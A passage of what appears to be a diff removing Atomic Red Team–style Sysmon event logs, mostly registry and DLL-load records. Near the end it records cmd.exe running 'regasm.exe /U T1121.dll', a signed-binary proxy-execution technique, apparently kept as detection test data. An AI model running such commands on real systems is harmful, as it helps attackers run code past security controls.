"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861210000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "terminate", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570861520000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6712, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": 
"ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861680000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5012, - "ppid": 6712, - "process_name": "RegAsm.exe", - "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "subtype": "create", - "timestamp": 131883570861830000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}", - "unique_ppid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - 